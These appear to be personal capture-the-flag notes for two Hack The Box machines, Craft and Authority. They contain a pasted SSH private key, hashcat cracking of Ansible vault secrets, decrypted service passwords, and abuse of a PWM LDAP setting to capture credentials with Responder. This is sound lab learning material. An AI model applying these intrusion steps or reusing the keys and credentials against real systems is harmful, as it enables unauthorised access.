b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDD9Lalqe
qF/F3X76qfIGkIAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDSkCF7NV2Z
F6z8bm8RaFegvW2v58stknmJK9oS54ZdUzH2jgD0bYauVqZ5DiURFxIwOcbVK+jB39uqrS
zU0aDPlyNnUuUZh1Xdd6rcTDE3VU16roO918VJCN+tIEf33pu2VtShZXDrhGxpptcH/tfS
RgV86HoLpQ0sojfGyIn+4sCg2EEXYng2JYxD+C1o4jnBbpiedGuqeDSmpunWA82vwWX4xx
lLNZ/ZNgCQTlvPMgFbxCAdCTyHzyE7KI+0Zj7qFUeRhEgUN7RMmb3JKEnaqptW4tqNYmVw
pmMxHTQYXn5RN49YJQlaFOZtkEndaSeLz2dEA96EpS5OJl0jzUThAAAD0JwMkipfNFbsLQ
B4TyyZ/M/uERDtndIOKO+nTxR1+eQkudpQ/ZVTBgDJb/z3M2uLomCEmnfylc6fGURidrZi
4u+fwUG0Sbp9CWa8fdvU1foSkwPx3oP5YzS4S+m/w8GPCfNQcyCaKMHZVfVsys9+mLJMAq
Rz5HY6owSmyB7BJrRq0h1pywue64taF/FP4sThxknJuAE+8BXDaEgjEZ+5RA5Cp4fLobyZ
3MtOdhGiPxFvnMoWwJLtqmu4hbNvnI0c4m9fcmCO8XJXFYz3o21Jt+FbNtjfnrIwlOLN6K
Uu/17IL1vTlnXpRzPHieS5eEPWFPJmGDQ7eP+gs/PiRofbPPDWhSSLt8BWQ0dzS8jKhGmV
ePeugsx/vjYPt9KVNAN0XQEA4tF8yoijS7M8HAR97UQHX/qjbna2hKiQBgfCCy5GnTSnBU
GfmVxnsgZAyPhWmJJe3pAIy+OCNwQDFo0vQ8kET1I0Q8DNyxEcwi0N2F5FAE0gmUdsO+J5
0CxC7XoOzvtIMRibis/t/jxsck4wLumYkW7Hbzt1W0VHQA2fnI6t7HGeJ2LkQUce/MiY2F
5TA8NFxd+RM2SotncL5mt2DNoB1eQYCYqb+fzD4mPPUEhsqYUzIl8r8XXdc5bpz2wtwPTE
cVARG063kQlbEPaJnUPl8UG2oX9LCLU9ZgaoHVP7k6lmvK2Y9wwRwgRrCrfLREG56OrXS5
elqzID2oz1oP1f+PJxeberaXsDGqAPYtPo4RHS0QAa7oybk6Y/ZcGih0ChrESAex7wRVnf
CuSlT+bniz2Q8YVoWkPKnRHkQmPOVNYqToxIRejM7o3/y9Av91CwLsZu2XAqElTpY4TtZa
hRDQnwuWSyl64tJTTxiycSzFdD7puSUK48FlwNOmzF/eROaSSh5oE4REnFdhZcE4TLpZTB
a7RfsBrGxpp++Gq48o6meLtKsJQQeZlkLdXwj2gOfPtqG2M4gWNzQ4u2awRP5t9AhGJbNg
MIxQ0KLO+nvwAzgxFPSFVYBGcWRR3oH6ZSf+iIzPR4lQw9OsKMLKQilpxC6nSVUPoopU0W
Uhn1zhbr+5w5eWcGXfna3QQe3zEHuF3LA5s0W+Ql3nLDpg0oNxnK7nDj2I6T7/qCzYTZnS
Z3a9/84eLlb+EeQ9tfRhMCfypM7f7fyzH7FpF2ztY+j/1mjCbrWiax1iXjCkyhJuaX5BRW
I2mtcTYb1RbYd9dDe8eE1X+C/7SLRub3qdqt1B0AgyVG/jPZYf/spUKlu91HFktKxTCmHz
6YvpJhnN2SfJC/QftzqZK2MndJrmQ=
-----END OPENSSH PRIVATE KEY-----

When I try to authenticate with ssh -i id_rsa gilfoyle@10.129.22.88 i get a message “Load key “id_rsa”: error in libcrypto”. From what I’ve read this can happen when SSH expects an older private key format called PEM. You can easily know which one is which by looking at the first line: New one: -----BEGIN OPENSSH PRIVATE KEY----- Old one: -----BEGIN RSA PRIVATE KEY-----

Luckily, the key can be formatted easily with ssh-keygen. First let’s make a copy of the original with cp id_rsa id_rsa-original and format the copy with ssh-keygen -p -f id_rsa -m PEM. When I tried to run this, I got another error stating Failed to load key id_rsa: error in libcrypto.

After some digging, I found an article stating that the issue was because the user didn’t include a newline after the closing line of the key. I went back and raw copied the key from the github. I had two new lines at the end, when I pasted it like so, it worked flawlessly.

Enumerating the user they don’t have any low hanging permissions or rights to take advantage on. Interestingly, I’m on the craft.htb host and not db which I suspected was the hostname of the Docker host.

Privilege Escalation

Vault

I looked a bit further and found .vault-token file which contains this token f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle. I looked through the filesystem with find / -iname "*vault*" 2>/dev/null and found these files.

/home/gilfoyle/.vault-token
/var/log/vaultssh.log
/usr/local/bin/vault
/usr/local/bin/vault-ssh-helper
/usr/local/etc/vault-ssh-helper.hcl

I then ran looked through them manually and greped for key words in them but didn’t find anything interesting. I tried to ssh into the port 6022 as maybe that is the vault that is mentioned. The amount of SSH files suggested that but I still can’t authenticate there. There are ssh related files and that the whole box is about web requests I decided to run my directory and subdomain enumerations as I canceled them prematurely at the start of the box. I scanned for some time but nothing new came up.

I looked again through the infra.craft repo and found a folder named vault. as both vault and vault-ssh-helper are in the bin folder I should be able to execute them and see how they work. I can read and list secrets from a vault, the issue is that I don’t know the path to it. I tried to do vault list /ssh/roles/root_otp as I saw this path in secrets.sh - didn’t work and seemed far fetched. There is a way to use ssh to authenticate into a vault, maybe i can use that token I found before in it. This is the info from the help option:

# Info from the `help` option
SSH using the OTP mode (requires sshpass for full automation):
	$ vault ssh -mode=otp -role=my-role user@1.2.3.4

SSH using the CA mode:
	$ vault ssh -mode=ca -role=my-role user@1.2.3.4

SSH using CA mode with host key verification:
	$ vault ssh \
		-mode=ca \
		-role=my-role \
		-host-key-mount-point=host-signer \
		-host-key-hostnames=example.com \
	user@example.com

There are three way to authenticate “one time password” and two “certificate authority” modes. Looking at the token I found it looks more like an OTP authentication.

I reviewed the source code and found these parts interesting:

vault write ssh/roles/root_otp \
 key_type=otp \
 default_user=root \
 cidr_list=0.0.0.0/0

Token: f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle

storage "file" {
	path = "/vault/data"
}
ui = false
listener "tcp" {
	address = "0.0.0.0:8200"
	tls_cert_file = "/vault/pki/vault.craft.htb.crt"
	tls_key_file = "/vault/pki/vault.craft.htb.key"
	tls_min_version = "tls12"

The first command is the most important one - it creates a role root_otp which can request to get OTPs for root and those request can come from any IP. This represents a lazy admin setup and because of this can get a root access simply by requesting it. The token is an OTP that was used by the user, it showed me what it looks like. The last script shows that the vault is located at /vault/data and that it is listening on all interfaces with HTTPS on the 8200 port.

To get the root, I simply ran vault ssh -mode=otp -role=root_otp root@10.129.22.88.

Closing Thoughts

This box was challenging to me, one of the most confusing I worked on. I had little experience until now with working with APIs and creating injections is something I need to practice more. I liked that I challenged myself to write my first working exploit for this box and it helped me to learn and refresh my Python knowledge. Simulation of reading up on a git repo and a really hands on code review was a great learning experience. I never worked with HashiCorp Vault before so this was also interesting - a lot of pivoting as well.

For code review and injections I think is important to try to really concentrate, go down the rabbit hole and really try to understand the logic of the mechanism. Sounds trivial I know, but I feel I could save a lot of time by starting with such hard mindset from the beginning.

PS: I still didn’t figure out what was port 6022 used for, so like ¯\(ツ)/¯

Authority

EmilPawlak@protonmail.com (Emil Pawlak) — 02.04.2026

Enumeration

I didn’t get any credentials assumed breach style so I will start with an enumeration.

nmap

Let’s start with a simple nmap enumeration.
sudo nmap -sC -sV -O -Pn 10.129.20.218; sleep 5; sudo nmap -p- -Pn 10.129.20.218; sleep 5; sudo nmap -sU 10.129.20.218

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-01 19:17 CEST
Nmap scan report for authority.htb.corp (10.129.20.218)
Host is up (0.029s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-01 21:17:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-01T21:18:10+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp open ssl/http Apache Tomcat (language: en)
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2026-03-30T14:07:45
|_Not valid after: 2028-04-01T01:46:09
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/1%OT=53%CT=1%CU=42908%PV=Y%DS=2%DC=I%G=Y%TM=69CD5352
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS=U
OS:)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=108%GCD=1%ISR=
OS:108%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=FD%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S
OS:%TS=U)SEQ(SP=FF%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M4E2NW8NNS
OS:%O2=M4E2NW8NNS%O3=M4E2NW8%O4=M4E2NW8NNS%O5=M4E2NW8NNS%O6=M4E2NNS)WIN(W1=
OS:FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=
OS:M4E2NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)
OS:T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 3h59m59s
| smb2-time: 
| date: 2026-04-01T21:18:05
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.14 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-01 19:18 CEST
Nmap scan report for authority.htb.corp (10.129.20.218)
Host is up (0.029s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8443/tcp open https-alt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49690/tcp open unknown
49691/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49703/tcp open unknown
49714/tcp open unknown
52328/tcp open unknown
59600/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 44.21 seconds

From this scan I can see a lot of Windows Domain related ports and a domain name so I will input that info into /etc/hosts with sudo vim /etc/hosts

SMB

Let’s start with SMB, I can see that I have access to two shares Development and IPC$ however after accessing the latter I wasn’t able to really look into it so let’s focus on the first one.

parrot@parrot (~): netexec smb 10.129.20.218 --shares -u guest -p ''
	Share Permissions Remark
	----- ----------- ------
	ADMIN$ Remote Admin
	C$ Default share
	Department Shares 
	Development READ 
	IPC$ READ Remote IPC
	NETLOGON Logon server share 
	SYSVOL Logon server share 

In Development I found Ansible holding four folders showing basic automation setup. Ansible is a general use, automation tool for admins. I looked through it manually and run some greps to look for passwords, creds, secrets and generally interesting data grep -R "pass". I found a lot of credentials of many kinds, even a bit of an overwhelming amount. To complete enumeration of possible users I also started a rid bruteforce to check known users on the host. netexec smb 10.129.20.218 -u guest -p '' --rid-brute

Users & groups

SMB 10.129.20.218 445 AUTHORITY 498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 500: HTB\Administrator (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 501: HTB\Guest (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 502: HTB\krbtgt (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 512: HTB\Domain Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 513: HTB\Domain Users (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 514: HTB\Domain Guests (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 515: HTB\Domain Computers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 516: HTB\Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 517: HTB\Cert Publishers (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 518: HTB\Schema Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 519: HTB\Enterprise Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 520: HTB\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 521: HTB\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 522: HTB\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 525: HTB\Protected Users (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 526: HTB\Key Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 527: HTB\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 553: HTB\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 1000: HTB\AUTHORITY$ (SidTypeUser)
SMB 10.129.20.218 445 AUTHORITY 1101: HTB\DnsAdmins (SidTypeAlias)
SMB 10.129.20.218 445 AUTHORITY 1102: HTB\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.20.218 445 AUTHORITY 1601: HTB\svc_ldap (SidTypeUser)

A bit surprising, there are no real users, maybe besides svc_ldap.

DNS

After that, I went and looked into DNS to learn more about the domain itself. I didn’t find much interesting information but I did notice that the name server was marked as authority.authority.htb which is a weird naming convention, nonetheless I added it to the /etc/hosts.

dig @authority.htb.comp 10.129.20.218 NS
<SNIP>
;; ANSWER SECTION:
authority.htb.		3600	IN	NS	authority.authority.htb.

HTTP port leads only to the default IIS website. I didn’t enumerate directories or subdomains, however it could be a good option if I wouldn’t find other promising vectors to pivot.

In Tomcat, I was greeted with this notice

PWM is currently in configuration mode. This mode allows updating the configuration without authenticating to an LDAP directory first. End user functionality is not available in this mode.

After you have verified the LDAP directory settings, use the Configuration Manager to restrict the configuration to prevent unauthorized changes. After restricting, the configuration can still be changed but will require LDAP directory authentication first.

PWM is a pretty popular authentication tool for Tomcat. It’s clearly is not setup correctly and it doesn’t allow me to use LDAP to authenticate. Due to it being in the configuration mode, there are other ways to authenticate.

Within them, I see another user, and another IP.

CN=svc_pwm,CN=Users,DC=htb,DC=corp (default) 	March 26, 2023 at 1:20:39 PM GMT 	10.129.204.183
n/a 	April 23, 2023 at 10:06:34 PM GMT 	

I can’t sign-in to the tomcat itself because and I get prompted with this information.

Directory unavailable. If this error occurs repeatedly please contact your help desk. 
5017 ERROR_DIRECTORY_UNAVAILABLE (all ldap profiles are unreachable; errors: ["error connecting as proxy user: unable to create connection: unable to connect to any configured ldap url, last error: unable to bind to ldaps://authority.authority.htb:636 as CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb reason: CommunicationException (authority.authority.htb:636; PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target)"])

I also can’t sign-in to the configuration page - I get the following error.

Password incorrect. Please try again.&lt;span class="errorDetail"&gt; { 5089 ERROR_PASSWORD_ONLY_BAD }&lt;/span&gt;<span class="errorDetail"> { 5089 ERROR_PASSWORD_ONLY_BAD }</span> { 5089 ERROR_PASSWORD_ONLY_BAD } 5089 ERROR_PASSWORD_ONLY_BAD

After trying multiple combinations of credentials I went back into the Ansible files which I downloaded locally with prompt OFF, recurse ON and mget * within the smbclient. In the PWM folder I found these hashes which turned out to be encrypted ansible blobs.

Ansible blobs

pwm_admin_login: !vault |
 $ANSIBLE_VAULT;1.1;AES256
 32666534386435366537653136663731633138616264323230383566333966346662313161326239
 6134353663663462373265633832356663356239383039640a346431373431666433343434366139
 35653634376333666234613466396534343030656165396464323564373334616262613439343033
 6334326263326364380a653034313733326639323433626130343834663538326439636232306531
 3438

pwm_admin_password: !vault |
 $ANSIBLE_VAULT;1.1;AES256
 31356338343963323063373435363261323563393235633365356134616261666433393263373736
 3335616263326464633832376261306131303337653964350a363663623132353136346631396662
 38656432323830393339336231373637303535613636646561653637386634613862316638353530
 3930356637306461350a316466663037303037653761323565343338653934646533663365363035
 6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
 $ANSIBLE_VAULT;1.1;AES256
 63303831303534303266356462373731393561313363313038376166336536666232626461653630
 3437333035366235613437373733316635313530326639330a643034623530623439616136363563
 34646237336164356438383034623462323531316333623135383134656263663266653938333334
 3238343230333633350a646664396565633037333431626163306531336336326665316430613566
 3764

It turns out, it’s possible to crack them up with ansible2john, however it took some editing. This video helped me to make sure my syntax worked with hashcat. I then users hashcat -m 16900 to crack them and I got !@#$%^&*. I wasn’t able to find the one specific vault, I only found the file the hashes were in using grep -R "$ANSIBLE_VAULT;1.1;AES256" (each ansible vault does start with this specific string). After that I just went over each hash file and decrypt it with ansible-vault view ansible1.hash --vault-password-file ansible-vault.pass. A note to take for sure is that Ansible is pretty picky with its syntax.
After the decryption we got the following information.

pwm_admin_login: svc_pwm
pwm_admin_password: pWm_@dm!N_!23
ldap_admin_password: DevT3st@123

Foothold

svc_pwm

With them, I wasn’t able to auth into LDAP of course, but I could enter the PWN login.

After I looked through the dashboard I noticed I was able to download a copy of the local database called PWM-LocalDB.bak. From the configuration files and my instinct I think the point of the authority.authority.htb is just to make tomcat misconfigured and simply changing it to authority.htb would fix the issue. If there will not be any interesting data in the database itself, there is also a way to upload a database. We know that the file would go into c:\pwm\LocalDB which could be used for a webshell if the file verification is weak.

The process to extract data from the MSSQL backup binary on Linux would be quite hard, I will leave it for the time being and try that webshell idea first. As this runs Tomcat which uses Java I should look into Java JSP or maybe lastly ASP shells.

I tried to install a rev_shell with the .jsp extension, PWN does require it to be a GZIP format. I tried double extensions, changing the extension in BurpSuite as well as adjusting the content-type however I wasn’t able to upload it.

I moved around and found that there are another import/upload options for the configuration file itself. I downloaded the configuration file and looked through it. Below are some very interesting finds.

Configuration file finds

<property key="configPasswordHash">
$2a$10$gC/eoR5DVUShlZV4huYlg.L2NtHHmwHIxF3Nfid7FfQLoh17Nbnua
</property>

<value>
CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
</value>

<value>
ENC-PW:2G7ASAs2W4Y/XTfVMSsRtxxneQpeWaKaQaNsaIToSKlyqC1dVT2VXcqc1h3SiYtMTYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPIvA8=
</value>

<setting key="pwm.securityKey" modifyTime="2022-08-11T01:46:23Z" syntax="PASSWORD" syntaxVersion="0">
<label>
Settings ⇨ Security ⇨ Application Security ⇨ Security Key
</label>
<value>
ENC-PW:7AJ39Hy6+a56Y3ppsO0J0KIXAFF7CBwO5IBODlXvH5gSmELLNpTgnWcbu5s/vU4JKue/Um6dkZm1RrcECBHk358zc045rDyFL2fDku2kusl79NE+Tww8gC8QQ0CX+VS2yyD46+ZS6Jriyu1Y7BOXnJifXXXsHzTmBTkodvnY33V6Puc0Zze0PGYHN+CGFtx/g5WaBTQbQwZwNLA+8Qe11GqCz+rBjGzQp0w6yLHJn+ZYBlLWgvZwN2KUHOiUIq5eKKDgjv+mga4zcB1STcpMJRaIiSnLdY3VCfsEj6p4BGz9jj+N7gQHBFAvI05JexXq8HyL7ZUEzLXU5FMQXvhhWSbhxoz7LH/iamvoOg13WnI3MRUzrXv91Uh7gdNZuXa1NmSBOe/g1GgmFV+0sxLIJ/99VT+GHIwrfjPNNV6jtKHhURPwp0a38c6aBGjpvB3AgAoZ0/KVLvQK1pAevO4NK2XFF2nPD8gQCQJMCsb62I+XMitkO2zKytrYEwZhl9VUGF0bAXQhC5I9xX1tEQAGBcENt1NGfM8iE+PlrZWwlr1yDjw+GZEm2KHyjnUFpBubqD7l7mvEJbEV26SQkR0v4R5LSEPbElOKGbGXMKkDEi53SQ5P0ZZQbega9XtBOHs+/s1EZ4p/qGVCvpD9dgc0SyS0auXU0PUddjxyXthHdqRbEWHhAduXYQgXF0eM2yWlbd7fTgSUMERlpjdFX/QZG3D6Ghp+iOCwfelEfKMQDO1myQcpq5YTE94YDz+aSWvi7ZGRIq+hRkwuR8E0EbEUE7CApDwF3LjGi+UEd9Y3Q9SPSMVxg4Ra2FB4sYCT19N7KV3TpGvJYD4SE8Mrn0cH9ihvlvDJFOxoLC9xM8FA9EAvSZN1w6lV4pUsVpUSM0LRKLqCmBCRJvaRNbhRymM96NFSSi4PwCCJQ7WVJjiS+oLQ+7qwHhqLQFy0+gtkGSQnBoq1FMYSCyGz/fUG84Xe0CSTPt4SwTq+L2M2jqsiB+HXq1z2LdkAFo6xm1Mqs6H/x5ZP1esjvRxDzHod31jRizu+rJw4LNRb172A36dQWmiq/OJQBJrnPu87s+KmoNyCJGrT2+1QttMgM62qy2/Eb6xByQ8RiLl6v87vf24TuWhxJhXfNWMRuHXJp2IWt5BWAYdiQNUjCuvRhfiyxsIqelpEpsOnm8WDVEsN0hqaEt9Db2e/d3Wpx1as4luVtA/MZtKy+gsH0qZUmouj7LCfN5TJpm00MiBTxYSkapKvAGchkE4UVc3AHGIxeyy+t2LwqT9fDSlS/VofOELNcQD3OfPi+asOrgaqcRbZVXdQumoJsubLMiPpHTZtOH2Nt13cEh9ZG/XebrAkchsMjsyLo5KX0nL6RKbMNUA3BmM2cd+bjj+Jar2aeAeqBdW+LU5ALshAsF986N1BGSsQ8aZkJwLi3PUYG8vGR88ZqEMMziQ=
</value>
</setting>

Given that the found user is svc_ldap I think this is the path I should follow further. We got an encrypted hash of a password as well as a security key of some kind, let’s read up on them. So form I have gathered: This is a bcrypt password hash $2a$10$gC/eoR5DVUShlZV4huYlg.L2NtHHmwHIxF3Nfid7FfQLoh17Nbnua

This is a PWM master key

7AJ39Hy6+a56Y3ppsO0J0KIXAFF7CBwO5IBODlXvH5gSmELLNpTgnWcbu5s/vU4JKue/Um6dkZm1RrcECBHk358zc045rDyFL2fDku2kusl79NE+Tww8gC8QQ0CX+VS2yyD46+ZS6Jriyu1Y7BOXnJifXXXsHzTmBTkodvnY33V6Puc0Zze0PGYHN+CGFtx/g5WaBTQbQwZwNLA+8Qe11GqCz+rBjGzQp0w6yLHJn+ZYBlLWgvZwN2KUHOiUIq5eKKDgjv+mga4zcB1STcpMJRaIiSnLdY3VCfsEj6p4BGz9jj+N7gQHBFAvI05JexXq8HyL7ZUEzLXU5FMQXvhhWSbhxoz7LH/iamvoOg13WnI3MRUzrXv91Uh7gdNZuXa1NmSBOe/g1GgmFV+0sxLIJ/99VT+GHIwrfjPNNV6jtKHhURPwp0a38c6aBGjpvB3AgAoZ0/KVLvQK1pAevO4NK2XFF2nPD8gQCQJMCsb62I+XMitkO2zKytrYEwZhl9VUGF0bAXQhC5I9xX1tEQAGBcENt1NGfM8iE+PlrZWwlr1yDjw+GZEm2KHyjnUFpBubqD7l7mvEJbEV26SQkR0v4R5LSEPbElOKGbGXMKkDEi53SQ5P0ZZQbega9XtBOHs+/s1EZ4p/qGVCvpD9dgc0SyS0auXU0PUddjxyXthHdqRbEWHhAduXYQgXF0eM2yWlbd7fTgSUMERlpjdFX/QZG3D6Ghp+iOCwfelEfKMQDO1myQcpq5YTE94YDz+aSWvi7ZGRIq+hRkwuR8E0EbEUE7CApDwF3LjGi+UEd9Y3Q9SPSMVxg4Ra2FB4sYCT19N7KV3TpGvJYD4SE8Mrn0cH9ihvlvDJFOxoLC9xM8FA9EAvSZN1w6lV4pUsVpUSM0LRKLqCmBCRJvaRNbhRymM96NFSSi4PwCCJQ7WVJjiS+oLQ+7qwHhqLQFy0+gtkGSQnBoq1FMYSCyGz/fUG84Xe0CSTPt4SwTq+L2M2jqsiB+HXq1z2LdkAFo6xm1Mqs6H/x5ZP1esjvRxDzHod31jRizu+rJw4LNRb172A36dQWmiq/OJQBJrnPu87s+KmoNyCJGrT2+1QttMgM62qy2/Eb6xByQ8RiLl6v87vf24TuWhxJhXfNWMRuHXJp2IWt5BWAYdiQNUjCuvRhfiyxsIqelpEpsOnm8WDVEsN0hqaEt9Db2e/d3Wpx1as4luVtA/MZtKy+gsH0qZUmouj7LCfN5TJpm00MiBTxYSkapKvAGchkE4UVc3AHGIxeyy+t2LwqT9fDSlS/VofOELNcQD3OfPi+asOrgaqcRbZVXdQumoJsubLMiPpHTZtOH2Nt13cEh9ZG/XebrAkchsMjsyLo5KX0nL6RKbMNUA3BmM2cd+bjj+Jar2aeAeqBdW+LU5ALshAsF986N1BGSsQ8aZkJwLi3PUYG8vGR88ZqEMMziQ=

This is a PWM encrypted password 2G7ASAs2W4Y/XTfVMSsRtxxneQpeWaKaQaNsaIToSKlyqC1dVT2VXcqc1h3SiYtMTYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPIvA8=

I don’t know how to decrypt the PWM’s blob with the master key, so I will go first with the bcrypt. I added it into a file and ran hashcat -m 3200 pwm.bcrypt /usr/share/wordlists/rockyou.txt When I started to decrypt it it showed me it will over a day (bcrypt is designed to be hard to crack). In turn, I will use a much smaller wordlists and look for other ways to pivot.

There are ways to decrypt the encrypted blob but I don’t want to run unsure git tools and GPT’s recommendations are similarly uncertain.

svc_ldap

Looking for other options I just realized that configuration “Manager” and “Editor” are not the same thing. There is a lot of data and settings in the editor that seem like interesting vectors.

In the configuration file I downloaded from the manager I tried to derive the password and found out that svc_ldap is the proxy username. I can see the same information in the editor however I can change it there. I can see, that LDAP is running in LDAPS. I wonder If i change it will i break the box or will I be able to pull some unencrypted data from the configuration.xml this time.

I changed ldaps://authority.authority.htb:636 to ldap://authority.authority.htb:389, saved the changes, went into the manager and collected the configuration file but it didn’t change it then. As the editor allows us to change the LDAP URL as well as the protocol itself. I decided to try and spit up Responder with sudo responder -I tun0 and after I edited the details and saved the changes I clicked “Test LDAP Profile”.

This caused the website to authenticate to my server and because I changed it from LDAPS to LDAP password came in clear text.

[LDAP] Cleartext Client : 10.129.20.218
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!

Then, I checked if I can authenticate to anything with the new credentials using netexec.
netexec smb 10.129.20.218 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
